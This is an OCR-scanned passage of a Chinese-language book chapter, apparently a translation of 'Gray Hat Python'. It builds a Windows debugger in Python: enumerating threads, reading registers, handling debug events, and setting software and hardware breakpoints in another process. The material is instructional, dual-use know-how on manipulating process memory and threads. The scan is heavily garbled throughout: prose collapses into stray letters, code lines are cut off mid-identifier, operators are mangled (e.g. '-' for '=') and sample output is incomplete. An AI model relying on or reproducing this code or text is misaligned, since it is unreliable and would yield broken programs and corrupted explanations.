一 个 调试 器 必须 能 够 在 任何 时 候 都 搜集 到 CPU 的 各 个 寄存 器 的 状态 。 当 异常 发 生 

的 时 候 这 能 让 我 们 确定 栈 的 状态 ， 目 前 正在 执行 的 指令 是 什么 ， 以 及 其 他 一 些 非 常 
有 用 的 信息 。 要 实现 这 个 目的 ， 首 先 要 获取 被 调试 目标 内 部 的 线程 句柄 ， 这 个 功能 
由 OpenThread() 实 现 . 函数 原型 如 下 : 


HANDLE WINAPI OpenThread( 
DWORD dwDesiredAccess, 
BOOL bInheritHandle, 
DWORD dwThreadId 

); 


这 看 起 来 非常 像 OpenProcess() 的 姐妹 函数 ， 除 了 这 次 是 用 线程 标识 符 (thread 
identifier TID) 提 到 了 进程 标识 符 (PID) o 


我 们 必须 先 获得 一 个 执行 着 的 程序 内 部 所 有 线程 的 一 个 列表 ， 然 后 选择 我 们 想 要 
的 ， 再 用 OpenThread() 获取 它 的 句柄 。 让 我 研究 下 如 何在 一 个 系统 里 
枚 举 线 程 (enumerate threads) 。 


3.2.1 枚 举 线 程 


为 了 得 到 一 个 进程 里 寄存 器 的 状态 ， 我 们 必须 枚 举 进程 内 部 所 有 正在 运行 的 线程 。 
线程 是 进程 中 真正 的 执行 体 〈 大 部 分 活 都 是 线程 干 的 ) ， 即 使 一 个 程序 不 是 多 线程 
的 ， 它 也 至 少 有 一 个 线程 ， 主 线程 。 实 现 这 一 功能 的 是 一 个 强大 的 函数 
CreateToolhelp32Snapshot()， 它 由 kernel32.dll S: HH. 3x ^ ES ZA BEMUS HH — ^ SERE 
内 部 所 有 线程 的 列表 ， 以 加 载 的 模块 (DLLs) 的 列表 ， 以 及 进程 所 拥有 的 堆 的 列 
表 。 画 数 原型 如 下 : 


HANDLE WINAPI CreateToolhelp32Snapshot( 
DWORD dwFlags, 
DWORD th32ProcessID 

); 


dwFlags 参数 标志 了 我 们 需要 收集 的 数据 类 型 (线程 ， 进 程 ， 模 块 ， 或 者 堆 ) 。 这 
里 我 们 把 它 设置 成 TH32CS_SNAPTHREAD， 也 就 是 0x00000004， 表 示 我 们 要 
搜集 快照 snapshot 中 所 有 已 经 注册 了 的 线程 。th32ProcessID 传人 我 们 
要 快照 的 进程 ， 不 过 它 只 对 TH32CS_SNAPMODULE， 
TH32CS_SNAPMODULE32, TH32CS_SNAPHEAPLIST and TH32CS_SNAPALL 
这 几 个 模块 有 用 ,对 TH32CS_SNAPTHREAD 可 是 没什么 用 的 哦 (后面 有 说 明 ) 。 
当 CreateToolhelp32Snapshot() 调 用 成 功 ， 就 会 返回 一 个 快照 对 象 的 句柄 ， 被 接 下 
来 的 函数 调 以 便 搜 集 更 多 的 数据 。 


一 旦 我 们 从 快照 中 获得 了 线程 的 列表 ， 我 们 就 能 用 Thread32First() MAES. PR 
数 原型 如 下 : 


BOOL WINAPI Thread32First( 
HANDLE hSnapshot, 
LPTHREADENTRY32 lpte 

); 


hSnapshot 就 是 上 面 通 过 CreateToolhelp32Snapshot() 3& 得 镜像 句柄 ，Ipte 
指向 一 个 THREADENTRY32 结构 (必须 初始 化 过 ) 。 这 个 结构 在 
Thread32First() 在 调用 成 功 后 自动 填 充 ， 其 中 包含 了 被 发 现 的 第 一 个 线程 的 相关 信 
息 。 结 构 定义 如 下 : 


typedef struct THREADENTRY32{ 
DWORD dwSize; 
DWORD cntUsage; 
DWORD th32ThreadID; 
DWORD th320wnerProcessID; 
LONG tpBasePri; 
LONG tpDeltaPri; 
DWORD dwFlags; 
3 


在 这 个 结构 中 我 们 感 兴趣 的 是 dwSize, th32ThreadlID, 和 th32OwnerProcessID 3 
个 参数 。 dwSize 必须 在 Thread32First() 调 用 之 前 初始 化 ， 只 要 把 值 设 置 成 
THREADENTRY32 结构 的 大 小 就 可 以 了 。th32ThreadID 是 我 们 当前 发 现 的 这 个 
线程 的 TID， 这 个 参数 可 以 被 前 面 说 过 的 OpenThread() 函数 调用 以 打开 此 线程 ， 
进行 别 的 操作 。 th32OwnerProcessID 填充 了 当前 线程 所 属 进 程 的 PID 。 为 
了 确定 线程 是 否 属于 我 们 调试 的 目标 进程 ， 需 要 将 
th32OwnerProcessID 的 值 和 目标 进程 对 比 ， 相 等 则 说 明 这 个 线程 是 我 们 正在 调试 
的 。 一 旦 我 们 获得 了 第 一 个 线程 的 信息 ， 我 们 就 能 通过 调用 Thread32Next() 获 取 
快照 中 的 下 一 个 线程 条 目 。 它 的 参数 和 Thread32First() 一 样 。 循 环 调用 
Thread32Next() 直 到 列表 的 末端 。 


3.2.2 把 所 有 的 组 合 起 来 


现在 我 们 已 经 获得 了 一 个 线程 的 有 效 句柄 ， 最 后 一 步 就 是 获取 所 有 寄存 器 的 值 。 这 
就 需 要 通过 GetThreadContext() 来 实现 。 同 样 我 们 也 能 用 SetThreadContext() 改 
变 它 们 。 


BOOL WINAPI GetThreadContext( 
HANDLE hThread, 
LPCONTEXT lpContext 


): 


BOOL WINAPI SetThreadContext( 
HANDLE hThread, 
LPCONTEXT lpContext 


): 


hThread 参数 是 从 OpenThread() 返回 的 线程 句柄 ，IpContext 指向 一 个 CONTEXT 
结构 ， 其 中 存储 了 所 有 寄存 器 的 值 。CONTEXT 非常 重要 ， 定 义 如 下 : 


typedef struct CONTEXT ( 

DWORD ContextFlags; 

DWORD DrO; 

DWORD Dri; 

DWORD Dr2; 

DWORD Dr3; 

DWORD Dr6; 

DWORD Dr7; 

FLOATING SAVE AREA FloatSave; 

DWORD  SegGs; 

DWORD SegFs,; 

DWORD  SegEs; 

DWORD SegDs,; 

DWORD Edi; 

DWORD Esi; 

DWORD  Ebx; 

DWORD  Edx; 

DWORD Ecx; 

DWORD  Eax; 

DWORD  Ebp; 

DWORD Eip; 

DWORD SegCs; 

DWORD EFlags; 

DWORD Esp; 

DWORD SegSs; 

BYTE ExtendedRegisters[MAXIMUM SUPPORTED EXTENSION]; 
}; 


如 你 说 见 所 有 的 寄存 器 都 在 这 个 列表 中 了 ， 包 括 调 试 寄存 器 和 段 寄 存 器 。 在 我 们 剩 
下 的 工作 中 ， 将 大 量 的 使 用 到 这 个 结构 ， 所 以 尽快 的 实习 起 来 。 


让 我 们 回来 看 看 我 们 的 老 朋 友 my. debugger.py 继续 扩展 它 ， 增 加 枚 举 线程 和 获取 
寄存 器 的 功能 。 


#my_debugger . py 
class debugger(): 


def open_thread (self, thread_id): 
h thread = kernel32.0penThread(THREAD ALL ACCESS, None, 
thread id) 
if h thread is not None: 
return h thread 
else: 
print "[*] Could not obtain a valid thread handle." 
return False 
def enumerate threads(self): 
thread entry = THREADENTRY32( ) 
36 Chapter 3 
thread list - [] 
snapshot = kernel32.CreateToolhelp32Snapshot (TH32CS 
_SNAPTHREAD, self.pid) 
if snapshot is not None: 
# You have to set the size of the struct 
# or the call will fail 
thread entry.dwSize = sizeof(thread entry) success = ke 
byref(thread entry)) 
byref(thread entry)) 
while success: 
if thread entry.th320wnerProcessID == self.pid: 
thread list.append(thread entry.th32ThreadID) 
success - kernel32.Thread32Next(snapshot, 
kernel32.CloseHandle(snapshot) return thread list 
else: 
return False 
def get thread context (self, thread id): 
context - CONTEXT() 
context.ContextFlags = CONTEXT FULL | CONTEXT DEBUG REGISTIE 
# Obtain a handle to the thread 
h thread = self.open thread(thread id) 
if kernel32.GetThreadContext(h thread, byref(context)): 
kerne132.CloseHandle(h thread) 
return context 
else: 
return False 
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调试 器 已 经 扩展 成 功 ， 让 我 们 更 新 测试 模块 试验 下 新 功能 。 


#my_test.py 
import my_debugger 
debugger = my debugger.debugger() 
pid = raw_input("Enter the PID of the process to attach to: ") debt 
list = debugger.enumerate threads() 
# For each thread in the list we want to 
# grab the value of each of the registers Building a Windows Debugt 
for thread in list: 
thread context - debugger.get thread context(thread) 
# Now let's output the contents of some of the registers 
print "[*] Dumping registers for thread ID: 0x9608x" % thread 
print "[**] EIP: 0x9608x" % thread context.Eip 
print "[**] ESP: 0x%08x" % thread context.Esp 
print "[**] EBP: 0x9608x" % thread context.Ebp 
print "[**] EAX: 0x%08x" % thread context.Eax 
print "[**] EBX: 0x%08x" % thread context.Ebx 
print "[**] ECX: 0x%08x" % thread context.Ecx 
print "[**] EDX: 0x9608x" % thread context.Edx 
print "[*] END DUMP" 
debugger .detach( ) 





当 你 运行 测试 代码 ， 你 将 看 到 如 清单 3-1 显示 的 数据 。 


Enter the PID of the process to attach to: 4028 
[*] Dumping registers for thread ID: 0x00000550 
[**] EIP: 0x7c90eb94 

[**] ESP: 0x0007fdeO 

[**] EBP: 0x0007fdfc 

[**] EAX: 0x006ee208 

[**] EBX: 0x00000000 

[**] ECX: 0x0007fdd8 

[**] EDX: 0x7c90eb94 

[*] END DUMP 

[*] Dumping registers for thread ID: 0x000005cO0 
[**] EIP: Ox7c95077b 

[**] ESP: 0x0094fff8 

[**] EBP: 0x00000000 

[**] EAX: 0x00000000 

[**] EBX: 0x00000001 

[**] ECX: 0x00000002 

[**] EDX: 0x00000003 

[*] END DUMP 

[*] Finished debugging. Exiting... 


Listing 3-1: 每 个 线程 的 CPU 寄存 器 值 

AET ! 我 们 现在 能 够 在 任何 时 候 查询 所 有 寄存 器 的 状态 了 。 试 验 下 不 同 的 进程 ,看 
看 能 得 到 什么 结果 。 到 此 为 止 我 们 已 经 完成 了 我 们 调试 器 的 核心 部 分 ， 是 时 间 实 现 
一 些 基 础 调试 事件 的 义理 函数 了 。 


Wl Python 之 旅 


3.2 获得 CPU 寄存 器 状态 
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3.3 实现 调试 事件 义理 


为 了 让 我 们 的 调试 器 能 够 针对 特定 的 事件 采取 相应 的 行动 ， 我 们 必须 给 所 有 调试 器 
能 够 捕捉 到 的 调试 事件 ， 编 写 处 理 罚 数 。 回 去 看 看 WaitForDebugEvent() HR, 
每 当 它 捕捉 到 一 个 调试 事件 的 时 候 ， 就 返回 一 个 填充 好 了 的 DEBUG_EVENT 结 
构 。 之 前 我 们 都 忽略 掉 这 个 结构 ， 直 接 让 进程 继续 执行 下 去 ， 现 在 我 们 要 用 存储 在 
结构 里 的 信息 决定 如 何 义理 调试 事件 。 DEBUG_EVENT 定义 如 下 : 


typedef struct DEBUG EVENT { 
DWORD dwDebugEventCode; 
DWORD dwProcessId; 
DWORD dwThreadId; 
union { 
EXCEPTION DEBUG INFO Exception; 
CREATE THREAD DEBUG INFO CreateThread; 
CREATE PROCESS DEBUG INFO CreateProcessInfo; 
EXIT THREAD DEBUG INFO ExitThread; 
EXIT PROCESS DEBUG INFO ExitProcess; 
LOAD DLL DEBUG INFO LoadD1l; 
UNLOAD DLL DEBUG INFO UnloadDll; 
OUTPUT DEBUG STRING INFO DebugString; 
RIP INFO RipInfo; 
ju; 
3 


在 这 个 结构 中 有 很 多 有 用 的 信息 。dwDebugEventCode 是 最 重要 的 ， 它 表明 了 是 
什么 事 件 被 WaitForDebugEvent() 捕捉 到 了 。 同 时 也 决定 了 ， 在 联合 (union )u 里 
存储 的 是 什么 类 型 H. u 里 的 变量 由 dwDebugEventCode 决定 ， 一 一 对 应 如 
F: 


Event 


Code Event Code Value Union u Value 
0x1 EXCEPTION_DEBUG_EVENT u.Exception 
0x2 CREATE_THREAD_DEBUG_EVENT u.CreateThread 
0x3 CREATE PROCESS DEBUG EVENT u.CreateProcesslnfo 
0x4 EXIT_THREAD_DEBUG_EVENT u.ExitThread 
0x5 EXIT PROCESS DEBUG EVENT u.ExitProcess 
0x6 LOAD DLL DEBUG EVENT u.LoadDIl 
Ox7 UNLOAD DLL DEBUG EVENT u.UnloadDIl 
0x8 OUPUT DEBUG STRING EVENT u.DebugString 
0x9 RIP_EVENT u.RipInfo 


Table 3-1: 调 试 事 件 


通过 观察 dwDebugEventCode 的 值 ， 再 通过 上 面 的 表 就 能 找到 与 之 相对 应 的 存储 
在 U 里 的 变量 。 让 我 们 修改 调试 循环 ， 通 过 获得 的 事件 代码 的 值 ， 显 示 当 前 发 生 的 
事件 信息 。 用 这 些 信息 ， 我 们 能 够 了 解 到 调试 器 启动 或 者 附加 一 个 线程 后 的 整个 流 
程 。 继 续 更 新 my_debugger.py 和 our my_test.py 脚本 。 


#my_debugger . py 


class debugger(): 
def init (self): 
self.h_process = None 
self.pid = None 
self.debugger active = False 
self.h_thread = None 
self.context = None 


def get_debug_event(self): 
debug event = DEBUG EVENT() 
continue status- DBG CONTINUE 
if kernel32.WaitForDebugEvent(byref(debug event), INFINITE) 
# Let's obtain the thread and context information 
self.h thread - self.open thread(debug event.dwThread) 
self.context - self.get thread context(self.h thread) 
print "Event Code: %d Thread ID: %d" % (debug event.dwl 
kernel32.ContinueDebugEvent( 
debug event.dwProcessId, 
debug event.dwThreadId, 
continue status ) 
4my test.py 
import my debugger 
debugger - my debugger.debugger() 
pid - raw input("Enter the PID of the process to attach to: ") 
debugger.attach(int(pid)) 
debugger.run() 
debugger .detach() 


如 果 你 用 的 是 calc.exe， 输 出 将 如 下 所 示 : 





Enter the PID of the process to attach to: 2700 
Event Code: Thread ID: 3976 
Event Code: Thread ID: 3976 
Event Code: Thread ID: 3976 
Event Code: Thread ID: 3976 
Event Code: Thread ID: 3976 
Event Code: Thread ID: 3976 
Event Code: Thread ID: 3976 
Event Code: Thread ID: 3976 
Event Code: Thread ID: 3976 
Event Code: Thread ID: 3976 
Event Code: Thread ID: 3912 
Event Code: Thread ID: 3912 
Event Code: Thread ID: 3912 


BRPRNAADWAVDWAVDWAA OD W 


Listing 3-2: 当 附加 到 cacl.exe 时 的 事件 代码 


基于 脚本 的 输出 ， 我 们 能 看 到 CREATE PROCESS EVENT (0x3) 事 件 是 第 一 个 发 
生 的 ， 接 下 来 的 是 一 堆 的 LOAD_DLL_DEBUG_EVENT (0x6) 事 件 ， 然 后 

CREATE THREAD DEBUG EVENT (0x2) 创建 一 个 新 线程 。 接 着 就 是 一 
个 EXCEPTION DEBUG EVENT (0x1) 例 外 事件 ， 它 由 windows 设置 的 断 点 所 引 
发 的 ， 人 允许 在 进程 启动 前 观察 进程 的 状态 。 最 后 一 个 事件 是 

EXIT THREAD DEBUG EVENT (0x4)， 它 由 进程 3912 结束 只 身 产 生 。 


例外 事件 是 非常 重要 ， 例 外 可 能 包括 断 点 ， 访 问 异常 ， 或 者 内 存 访问 错误 Cn 
试 写 到 一 个 只 读 的 内 存 区 ) 。 所 有 这 些 都 很 重要 ， 但 是 让 我 们 捕捉 先 捕捉 第 一 个 
windows 设置 的 断 点 。 打 开 my_debugger.py 加 入 以 下 代码 : 


#my_debugger 


class debugg 
def init 
self 

self 

self 

self 

self 

self 

self 


def get_ 


debu 
cont 
Xf k 


‘py 


er(): 

(self): 

.h process - None 

.pid - None 

.debugger active - False 
.h thread - None 

.context - None 
.exception - None 
.exception address - None 


debug event(self): 
g event - DEBUG EVENT() 
inue status- DBG CONTINUE 
ernel132.WaitForDebugEvent(byref(debug event), INFINITE) 
# Let's obtain the thread and context information 
self.h thread = self.open thread(debug event.dwThreadI« 
self.context - self.get thread context(self.h thread) 
print "Event Code: %d Thread ID: %d" % (debug event.dwl 
# If the event code is an exception, we want to 
# examine it further. 
if debug event.dwDebugEventCode -- EXCEPTION DEBUG EVE! 

# Obtain the exception code 

exception = debug event.u.Exception.ExceptionRecort( 

self.exception address = debug event.u.Exception.E» 
if exception -- EXCEPTION ACCESS VIOLATION: 

print "Access Violation Detected." 

# If a breakpoint is detected, we call an internal 

# handler. 
elif exception -- EXCEPTION BREAKPOINT: 

continue status = self.exception handler breakpoinl 
elif ec -- EXCEPTION GUARD PAGE: 

print "Guard Page Access Detected." 
elif ec -- EXCEPTION SINGLE STEP: 

print "Single Stepping." 
kernel32.ContinueDebugEvent( 

debug event.dwProcessId, 

debug event.dwThreadId, 

continue status ) 


def exception handler breakpoint(): 
print "[*] Inside the breakpoint handler." 
print "Exception Address: 0x%08x" % self.exception address 
return DBG CONTINUE 


E EE) 





MRIS TR MAA, FAR RHR ERA R dk 
们 已 经 创建 了 硬件 断 点 和 内 存 断 点 的 处 理 模 型 。 接 下 来 我 们 要 详细 的 实现 这 三 种 不 


同类 型 断 点 的 处 


FB EAN, 


3.4 全 能 的 断 点 


现在 我 们 已 经 有 了 一 个 能 够 正常 运行 的 调试 器 核心 ， 是 时 候 加 入 断 点 功能 了 。 用 我 
们 在 第 二 章 学 到 的 ， 实 现 设置 软件 ， 硬 件 ， 内 存 三 种 断 点 的 功能 。 接 着 实现 与 之 对 
应 的 断 点 处 理 函数 ， 最 后 在 断 点 被 击 中 之 后 干净 的 恢复 进程 。 


3.4.1 软件 断 点 


为 了 设置 软件 断 点 ， 我 们 必须 能 够 将 数据 写 人 目标 进程 的 内 存 。 这 需要 通过 
ReadProcessMemory() 和 WriteProcessMemory() 实 现 。 它 们 非常 相似 : 


BOOL WINAPI ReadProcessMemory( 
HANDLE hProcess, 
LPCVOID lpBaseAddress, 
LPVOID lpBuffer, 
SIZE T nSize, 
SIZE T* lpNumberOfBytesRead 


): 


BOOL WINAPI WriteProcessMemory( 
HANDLE hProcess, 
LPCVOID lpBaseAddress, 
LPCVOID lpBuffer, 
SIZE T nSize, 
SIZE T* lpNumberOfBytesWritten 


); 


这 两 个 函数 都 允许 调试 器 观察 和 更 新 被 调试 的 进程 的 内 存 。 参 数 也 都 很 简单 。 
IpBaseAddress 是 要 开始 读 或 者 些 的 目标 地 址 ， lpBuffer 指向 一 块 缓冲 区 ， 用 来 接 
收 IpBaseAddress 读 出 的 数据 或 者 宇和 IpBaseAddress 。 nSize 是 想 要 读 写 的 
数据 大 小 ，IpNumberOfBytesWritten 由 函数 填写 ， 通 过 它 我 们 就 能 够 知道 一 次 
操作 过 后 实际 读 写 了 的 数 df. 


现在 让 我 们 的 调试 器 实现 软件 断 点 就 相当 容易 了 。 修 改 调试 器 的 核心 类 ， 以 支持 设 
IERI 处 理 软件 断 点 。 
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#my_debugger . py 


class debugger(): 
def init (self): 
self.h_process 
self.pid = None 
self.debugger active 


None 


= False 
self.h thread - None 
self.context None 
self.breakpoints {} 


def read process memory(self,address,length): data = "" 

read buf - create string buffer(length) 

count = c ulong(0) 

if not kernel32.ReadProcessMemory(self.h process, 
address, 
read buf, 
length, 
byref(count)): 


return False 
else: 
data += read buf.raw return data 
def write process memory(self,address,data): count 
length - len(data) 
c data - c char p(data[count.value:]) 
if not kernel32.WriteProcessMemory(self.h process, 
address, 
c data, 
length, 
byref(count)): 


return False 
else: 
return True 
bp set(self,address): 
if not self.breakpoints.has key(address): 
try: 
# store the original byte 
original byte 
# write the INT3 opcode 
self.write process memory(address, 


def 


"\xCC") 


c_ulong(0. 


self.read process memory(address, : 


# register the breakpoint in our internal list sel! 


except: 
return False 
return True 





现在 调试 器 已 经 支持 软件 断 点 了 ， 我 们 需要 找 个 地 址 设置 一 个 试 试看。 一 般 断 点 设 
Bt 函数 调用 的 地 方 ， 为 了 这 次 实验 ， 我 们 就 用 老 朋 友 printf() 作 为 将 要 捕获 的 目 
te NR. Windows 调试 API 提供 了 简洁 的 方法 以 确定 一 个 函数 的 虚拟 地 址 ， 


GetProcAddress(), 同样 也 是 从 kernel32.dll 导出 的 。 这 个 函数 需要 的 主要 参数 就 
是 一 个 模块 (一 个 dl 或 者 一 个 .exe 文件 ) 的 句柄 。 模 块 中 一 般 都 包含 了 我 们 感 兴 
RAYE: 可 以 通过 GetModuleHandle() 获 得 模块 的 句柄 。 原 型 如 下 : 


FARPROC WINAPI GetProcAddress( 
HMODULE hModule, 
LPCSTR lpProcName 


E 
HMODULE WINAPI GetModuleHandle( 
LPCSTR lpModuleName 
); 


这 是 一 个 很 清晰 的 事件 链 : 获得 一 个 模块 的 句柄 ， 然 后 查找 从 中 导出 感 兴 趣 的 函数 
的 地 址 。 让 我 们 增加 一 个 调试 函数 ， 完 成 刚 才 做 的 。 回 到 my_debugger.py.。 


my debugger.py 
class debugger(): 


def func resolve(self,dll,function): 
handle - kernel32.GetModuleHandleA(dll) 
address = kernel32.GetProcAddress(handle, function) 
kerne132.CloseHandle(handle) 
return address 


现在 创建 第 二 个 测试 套件 ， 循 环 的 调用 printf()。 我 们 将 解析 出 函数 的 地 址 ， 然后 
在 这 个 地 址 上 设 置 一 个 断 点 。 之 后 断 点 被 触发 ， 就 能 看 见 输 出 结果 ， 最 后 被 测试 的 
进程 继续 执行 循环 。 创 建 一 个 新 的 Python 脚本 printf_loop.py， 输 入 下 面 代 码 。 


#printf_loop.py from ctypes 

import * import time 

msvcrt = cdll.msvcrt 

counter = 0 

while 1: 
msvcrt.printf("Loop iteration %d!\n" % counter) 
time.sleep(2) 
counter += 1 


现在 更 新 测试 套件 ， 附 加 到 进程 ， 在 printf() 上 设置 断 点 。 


#my_test.py 

import my_debugger 

debugger = my debugger.debugger() 

pid = raw_input("Enter the PID of the process to attach to: ") 
debugger .attach(int(pid) ) 

printf address = debugger.func resolve("msvcrt.dll","printf") 
print "[*] Address of printf: 0x%08x" % printf address 
debugger.bp set(printf address) 

debugger.run() 


现在 开始 测试 ， 在 命令 行 里 运行 printf_loop.py。 从 Windows 任务 管理 器 里 获得 
python.exe 的 PID。 然 后 运行 my_test.py ， 键 入 PID。 你 将 看 到 如 下 的 输出 : 


Enter the PID of the process to attach to: 4048 
[*] Address of printf: Ox77c4186a 
[*] Setting breakpoint at: 0x77c4186a 
Event Code: 3 Thread ID: 3148 
Event Code: Thread ID: 3148 
Event Code: Thread ID: 3148 
Event Code: Thread ID: 3148 
Event Code: Thread ID: 3148 
Event Code: Thread ID: 3148 
Event Code: Thread ID: 3148 
Event Code: Thread ID: 3148 
Event Code: Thread ID: 3148 
Event Code: Thread ID: 3148 
Event Code: Thread ID: 3148 
Event Code: Thread ID: 3148 
Event Code: Thread ID: 3148 
Event Code: Thread ID: 3148 
Event Code: Thread ID: 3148 
Event Code: Thread ID: 3148 
Event Code: Thread ID: 3148 
Event Code: Thread ID: 3620 
Event Code: 1 Thread ID: 3620 

[*] Exception address: 0x7c901230 
[*] Hit the first breakpoint. 
Event Code: 4 Thread ID: 3620 
Event Code: 1 Thread ID: 3148 

[*] Exception address: 0x77c4186a 
[*] Hit user defined breakpoint. 


NOoOOo00000000000000 


Listing 3-3: 义理 软件 断 点 事件 的 事件 顺序 


我 们 首先 看 到 printf() 的 函数 地 址 在 0x77c4186a， 然 后 在 这 里 设置 断 点 。 第 一 个 捕 
捉 到 的 异常 是 由 Windows 设置 的 断 点 触发 的 。 第 二 个 异常 发 生 的 地 址 在 
0x77c4186a, 也 就 是 printf() 函数 的 地 址 。 断 点 处 理 之 后 ， 进 程 特 恢复 循环 。 现 在 我 
们 的 调试 器 已 经 支持 软件 断 点 ， 接 下 来 轮 到 硬件 断 点 了 。 


3.4.2 硬件 断 点 


第 二 种 类 型 的 断 点 是 硬件 断 点 ， 通 过 设置 相对 应 的 CPU 调试 寄存 器 来 实现 。 我 们 
在 之 前 的 章节 已 经 详细 的 讲解 了 过 程 ， 现 在 来 具体 的 实现 它们 。 有 一 件 很 重要 的 事 
情 要 记 住 ， 当 我 们 使 用 硬件 断 点 的 时 候 要 跟踪 四 个 可 用 的 调试 寄存 器 哪个 是 可 用 的 
哪个 已 经 被 使 用 了 。 必 须 确保 我 们 使 用 的 那个 寄存 器 是 空 的 ， 否 则 硬件 断 点 就 不 能 
在 我 们 希望 的 地 方 触发 。 


让 我 们 开始 枚 举 进 程 里 的 所 有 线程 ， 然 后 获取 它们 的 CPU 内 容 拷 贝 。 通 过 得 到 内 
Ste 贝 ， 我 们 能 够 定义 DRO 到 DRI 寄存 器 的 其 中 一 个 ， 让 它 包含 目 标 断 点 地 址 。 
之 后 我 们 在 DR7 寄存 器 的 相应 的 位 上 设置 断 点 的 属性 和 长 度 。 


设置 断 点 的 代码 之 前 我 们 已 经 完成 了 ， 剩 下 的 就 是 修改 处理 调试 事件 的 主 酚 数 ， 让 
它 能 够 处 理由 硬件 断 点 引发 的 异常 。 我 们 知道 硬件 断 点 由 INT (或 者 说 是 步 进 事 
件 ), 所 以 我 们 就 只 要 就 当 的 添加 另 一 个 异常 处 理 辑 数 到 调试 循环 里 。 让 我 们 设置 断 


JNO 


#my_debugger . py 


class debugger(): 
def init (self): 

self.h_process = None 
self.pid = None 
self.debugger active = False 
self.h thread - None 
self.context - None 
self.breakpoints = {} 
self.first breakpoint- True 
self.hardware breakpoints = {} 


def bp set hw(self, address, length, condition): 

# Check for a valid length value 

if length not in (1, 2, 4): 
return False 

else: 
length -= 1 

# Check for a valid condition 

if condition not in (HW ACCESS, HW EXECUTE, HW WRITE): reti 

# Check for available slots 

if not self.hardware_breakpoints.has_key(0): 
available = 0 

elif not self.hardware breakpoints.has key(1): 
available - 1 

elif not self.hardware breakpoints.has key(2): 
available - 2 

elif not self.hardware breakpoints.has key(3): 
available - 3 

else: 
return False 

4 We want to set the debug register in every thread 

for thread id in self.enumerate threads(): 


ER 汪汪 


context = self.get thread context(thread id-thread id) 
4 Enable the appropriate flag in the DR7 
# register to set the breakpoint 
context.Dr7 |= 1 << (available * 2) 
# Save the address of the breakpoint in the 
# free register that we found 
if available == 


e 


context.DrO - address 
elif available -- 1: 
context.Dri = address 
elif available == 2: 
context.Dr2 = address 
elif available == 3: 
context.Dr3 = address 


# Set the breakpoint condition 

context.Dr7 |= condition << ((available * 4) + 16) 

# Set the length 

context.Dr7 |= length << ((available * 4) + 18) 

# Set thread context with the break set 

h_thread = self.open_thread(thread_id) 
kernel32.SetThreadContext(h_thread, byref(context) ) 

# update the internal hardware breakpoint array at the usec 
# slot index. 

self.hardware breakpoints[available] = (address, length, conc 
return True 





通过 确认 全 局 的 硬件 断 点 字典 ， 我 们 选择 了 一 个 空 的 调试 寡 存 器 存储 人 硬件 断 点 。 一 
且 我 们 得 到 空位 ， 接 下 来 做 的 就 是 将 硬件 断 点 的 地 址 填 和 人 调试 寄存 器 ， 然 后 对 DR7 
的 标志 位 进行 更 新 适当 的 更 新 ， 启 动 断 点 。 现 在 我 们 已 经 能 够 处 理 硬件 断 点 了 ， 让 
我 们 更 新 事件 处 理 函 数 添 加 一 个 INT1 Pe E, 


#my_debugger . py 


class debugger(): 


def 


def 


get_debug_event(self): 
if self.exception == EXCEPTION_ACCESS_VIOLATION: 
print "Access Violation Detected." 
elif self.exception == EXCEPTION BREAKPOINT: 
continue status - self.exception handler breakpoint() 
elif self.exception -- EXCEPTION GUARD PAGE: 
print "Guard Page Access Detected." 
elif self.exception -- EXCEPTION SINGLE STEP: 
self.exception handler single step() 
exception handler single step(self): 
# Comment from PyDbg: 
# determine if this single step event occurred in reaction 
# hardware breakpoint and grab the hit breakpoint. 
# according to the Intel docs, we should be able to check 1 


# the BS flag in Dr6\. but it appears that Windows 
# isn't properly propagating that flag down to us. 
if self.context.Dr6 & Ox1 and self.hardware breakpoints.ha: 


slot = 0 

elif self.context.Dr6 & Ox2 and self.hardware_breakpoints.| 
slot = 1 

elif self.context.Dr6 & Ox4 and self.hardware breakpoints.l 
slot - 2 

elif self.context.Dr6 & 0x8 and self.hardware breakpoints.l 
slot - 3 


else: 
# This wasn't an INT1 generated by a hw breakpoint 
continue status - DBG EXCEPTION NOT HANDLED 
# Now let's remove the breakpoint from the list 
if self.bp del hw(slot): 
continue status - DBG CONTINUE 
print "[*] Hardware breakpoint removed." 
return continue status 
def bp del hw(self,slot): 
# Disable the breakpoint for all active threads 
for thread id in self.enumerate threads(): 
context - self.get thread context(thread id-thread id) 
# Reset the flags to remove the breakpoint 
context.Dr7 &- -(1 «« (slot * 2)) 
# Zero out the address 
if slot -- 
context.DrO = 0x00000000 
elif slot -- 
context.Dr1i = 0x00000000 
elif slot -- 
context.Dr2 = 0x00000000 
elif slot -- 
context.Dr3 = 0x00000000 
# Remove the condition flag 
context.Dr7 &- -(3 «« ((slot * 4) + 16)) 
# Remove the length flag 
context.Dr7 &- -(3 «« ((slot * 4) + 18)) 
# Reset the thread's context with the breakpoint remove 
h_thread = self.open_thread(thread_id) 
kernel32.SetThreadContext(h_thread, byref(context) ) 
# remove the breakpoint from the internal list. 
del self.hardware breakpoints[slot] 
return True 


B] 


代码 很 容易 理解 ; 当 INT1 REA (ARR) 的 时 候 ， 查 看 是 否 有 调试 寄存 器 能 够 设 
te 件 断 点 (通过 检测 DR6) 。 如 果 有 能 够 使 用 的 就 继续 。 接 着 如 果 在 发 生 异 常 
的 地 址 发 现 一 个 硬件 断 点 ， 就 将 DR7 的 标志 位 置 需 ， 在 其 中 的 一 个 寄存 器 中 填 入 
断 点 的 地 址 。 让 我 们 修改 my test.py 并 在 printf() 上 设置 硬件 断 点 看 看 。 





#my_test.py 

import my_debugger 

from my debugger defines import * 

debugger - my debugger.debugger() 

pid - raw input("Enter the PID of the process to attach to: ") debi 
printf - debugger.func resolve("msvcrt.dll","printf") 

print "[*] Address of printf: 0x%08x" % printf 
debugger.bp set hw(printf,1,HW EXECUTE) debugger.run() 








这 个 测试 模块 在 printf().Ezxi& STAR, RRRA, MRAR JRE. NT 
点 的 长 度 是 一 个 字 节 。 你 应 该 注意 到 在 这 个 模块 中 我 们 导 人 了 
my_debugger_defines.py 文件 ; 为 的 是 访问 HW EXECUTE 变量 ， 这 样 书写 能 使 
代码 更 清晰 。 


运行 后 输出 结果 如 下 : 


Enter the PID of the process to attach to: 2504 
[*] Address of printf: 0x77c4186a 
Event Code: 3 Thread ID: 3704 
Event Code: Thread ID: 3704 
Event Code: Thread ID: 3704 
Event Code: Thread ID: 3704 
Event Code: Thread ID: 3704 
Event Code: Thread ID: 3704 
Event Code: Thread ID: 3704 
Event Code: Thread ID: 3704 
Event Code: Thread ID: 3704 
Event Code: Thread ID: 3704 
Event Code: Thread ID: 3704 
Event Code: Thread ID: 3704 
Event Code: Thread ID: 3704 
Event Code: Thread ID: 3704 
Event Code: Thread ID: 3704 
Event Code: Thread ID: 3704 
